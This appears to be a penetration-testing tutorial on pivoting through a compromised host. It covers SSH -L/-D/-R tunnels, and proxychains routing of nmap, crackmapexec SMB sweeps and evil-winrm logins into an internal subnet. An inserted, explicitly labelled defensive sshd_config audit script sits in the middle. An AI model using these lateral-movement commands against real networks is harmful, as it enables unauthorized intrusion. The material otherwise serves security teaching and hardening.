The Pivot Concept
Pivoting means using a compromised machine as a relay to reach network segments you can't access directly. In a typical scenario: you compromise an internet-facing server. That server has two network interfaces — one on the external network, one on an internal segment with the database servers, domain controllers, and everything interesting. From your attack machine, those internal hosts are unreachable. But from the compromised server, they're right there.
The goal is to route your traffic through the pivot point so your attack tools can interact with internal hosts as if you were on the same network. Port forwarding does this for specific ports. SOCKS proxies do it for all TCP traffic. The choice depends on what tools you need to use and what's available on the pivot host.
SSH Tunneling
SSH has three tunnelling modes built in. Local port forwarding opens a port on your machine and forwards it to a destination accessible from the SSH server. Remote port forwarding opens a port on the SSH server and forwards it back to your machine. Dynamic port forwarding creates a SOCKS proxy on your local machine that routes all traffic through the SSH server.
ssh -L 8080:INTERNAL_HOST:80 user@PIVOT_IP   # Access INTERNAL_HOST:80 at localhost:8080
ssh -D 1080 user@PIVOT_IP                    # SOCKS5 proxy at localhost:1080; route all tools through it
ssh -R 4444:localhost:4444 user@PIVOT_IP     # Listen on the pivot's port 4444 and forward back to attacker:4444 (loopback only unless sshd has GatewayPorts enabled)
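As a defensive counterpart to the three modes above, here is an added example (not from the original article) that audits an sshd_config for the directives each mode depends on: AllowTcpForwarding for -L/-D/-R, GatewayPorts for whether an -R listener may bind beyond loopback, and PermitTunnel for tun devices. The sample config is constructed and the helper names `effective_settings` and `findings` are my own; the parser honours sshd's first-occurrence rule, which a naive last-value parser gets wrong.

```python
# Added example, not from the original article: audit an sshd_config for the
# OpenSSH directives that govern the -L/-D/-R tunnelling modes shown above.
# Assumption: only the global section is audited; parsing stops at Match.

DEFAULTS = {  # values sshd uses when the directive is absent
    "allowtcpforwarding": "yes",  # required by -L, -D and -R
    "gatewayports": "no",         # -R listeners bind loopback unless yes
    "permittunnel": "no",         # layer-2/3 tun forwarding (ssh -w)
}

def effective_settings(config_text):
    """Value sshd applies per audited directive. Keywords are case-insensitive,
    written "Key value" or "Key=value"; the FIRST occurrence of a keyword wins."""
    settings, seen = dict(DEFAULTS), set()
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key == "match":
            break  # everything after the first Match line is conditional
        if key in settings and key not in seen:
            settings[key] = value
            seen.add(key)
    return settings

def findings(config_text):
    """List directives whose effective value still permits tunnelling."""
    s = effective_settings(config_text)
    out = []
    if s["allowtcpforwarding"] != "no":
        out.append(f"AllowTcpForwarding {s['allowtcpforwarding']}: -L/-D/-R tunnels permitted")
    if s["gatewayports"] != "no":
        out.append(f"GatewayPorts {s['gatewayports']}: -R listeners may bind external interfaces")
    if s["permittunnel"] != "no":
        out.append(f"PermitTunnel {s['permittunnel']}: tun device forwarding permitted")
    return out

# Constructed sample: forwarding disabled, then "re-enabled" by an ignored
# later duplicate and by a conditional Match block.
SAMPLE_CONFIG = """
Port 22
AllowTcpForwarding no
GatewayPorts yes
AllowTcpForwarding=yes
Match User backup
    AllowTcpForwarding yes
"""

print("\n".join(findings(SAMPLE_CONFIG)))
```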
Proxychains and Tool Routing
Once you have a SOCKS proxy, proxychains lets you route almost any tool's traffic through it. It intercepts network calls and redirects them. Prefix your command with proxychains and the tool's traffic goes through your pivot.
# /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 1080

proxychains nmap -sT -p 80,443,22 INTERNAL_HOST
proxychains crackmapexec smb INTERNAL_SUBNET/24
proxychains evil-winrm -i INTERNAL_HOST -u user -p [REDACTED]
Chisel for Non-SSH Pivots
When SSH isn't available, Chisel creates tunnels over HTTP/HTTPS. A server binary on your machine listens for connections. A client binary on the pivot host connects back to your server and creates the tunnel. This is useful on Windows pivots or when SSH is blocked. Ligolo-ng is an alternative that creates a full TUN interface and removes the need for proxychains entirely.